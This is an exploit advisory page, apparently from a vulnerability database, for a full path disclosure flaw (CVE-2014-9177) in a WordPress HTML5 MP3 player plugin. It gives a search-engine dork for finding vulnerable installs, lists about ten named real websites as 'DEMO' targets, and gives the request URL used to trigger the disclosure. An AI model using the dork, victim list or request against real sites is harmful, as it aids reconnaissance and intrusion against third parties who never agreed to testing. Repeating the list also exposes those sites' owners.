WordPress Html5 Mp3 Player Full Path Disclosure

2014-11-26 / 2015-04-19

Credit: KnocKout

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2014-9177

CWE: N/A

Dork: inurl:html5plus/html5full.php

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
|~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
|~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
|~Vulnerability Style : FULL PATH DISCLOSURE
|[~]Date : "26.11.2014"
|[~]Tested on : Kali Linux, Windows 7
|DORK: inurl:html5plus/html5full.php
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| DEMO :
http://childhelpline.org.kh/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://falkopingstrumkar.se/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://groupe-komett.com//wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://www.nethinimnet.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://vedanet.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://auricle.org.nz/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://www.miguelguldimann.com/shop/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://cp2.leos.co.il/~yossimoadi/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://www.ambedkaritepartyofindia.org/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
http://www.zionchurchmillersville.com/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php
..
..
..
etc
==============[Exploitation]===============================
http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Html5 Mp3 Player Full Path Disclosure

Dork: inurl:html5plus/html5full.php

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.